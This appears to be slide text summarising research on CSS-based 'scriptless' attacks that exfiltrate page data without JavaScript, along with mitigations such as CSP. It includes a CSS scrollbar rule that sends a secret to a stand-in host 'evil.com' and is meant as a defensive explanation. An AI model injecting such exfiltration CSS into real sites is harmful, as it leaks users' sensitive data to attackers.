SCRIPT LESS ATTACKSSTEALING THE PIE WITHOUT TOUCHING THE SILL

BACKGROUND

• XSS recently replaced SQL injection and related server-side injection attacks as the number one threat in the OWASP (Open Web Application Security Project) ranking.

• As popular applications like Skype, Outlook, Thunderbird, Windows 8 are using HTML, security extensions like NoScript are being used by users.

• Given all these defense strategies, we expect that attackers will thrive towards developing “Scriptless Attacks” which achieve same goal as XSS attacks without using any scripting.

BEYOND SCRIPT-BASED ATTACKS• Assumptions:

• The attacker can inject arbitrary data into the DOM rendered by the browser

• We assume that scripting is completely disabled

• The following browser features to be useful building blocks in constructing attacks

- Web-fonts based on SVG and WOFF• Attacker employ these fonts and utilize their

features to vary the properties of displayed website content.

ATTACK COMPONENTS

• CSS-based Animations• With CSS based animations, it is possible to over time

change a wide range of CSS and DOM properties without using any script code

• The CSS Content Property• CSS allows to use a property called content to extract

arbitrary attribute values and display the value either before, after, or instead of the selected element

• CSS Media Queries

<style type="text/css">

@media screen and (min -width: 401px){

*{ background:green;}

body:after{content:’larger view -port’}

}

@media screen and (max -width: 400px) {

*{ background:red;}

body:after{content:’smaller view -port’ }

}

</style >

a[href^=http://]:after{content:attr(href)}

MEASUREMENT-BASED CONTENT EXFILTRATION- USING SMART SCROLLBARS

• To enable a purely CSS-based data exfiltration attack, we utilize all of the available features listed in above section.

<div id="s">secret </div >

<style type="text/css">

div#s::-webkit -scrollbar -track -piece

:vertical:increment {

background:red url(// evil.com?s); }

</style >

• To mitigate this attack,• it is recommended to treat scrollbar backgrounds and

scrollbar state backgrounds equally;

• all background images and similar external resources should be loaded during page-load and not on appearance or state occurrence.

MITIGATION TECHNIQUES• We conclude that several layers of protection are necessary to

effectively and holistically defend against CSS-, SVG- and HTML-based data leakage

1. Content Security Policy (CSP)

2. Detecting Detached Views

3. Miscellaneous Defense Techniques

Conclusion :

While the attacks discussed in this paper presumably do not represent the entirety of ways to illegitimately retrieve sensitive user-data, we believe that the attack components discussed in this paper are of great importance to other attack vectors.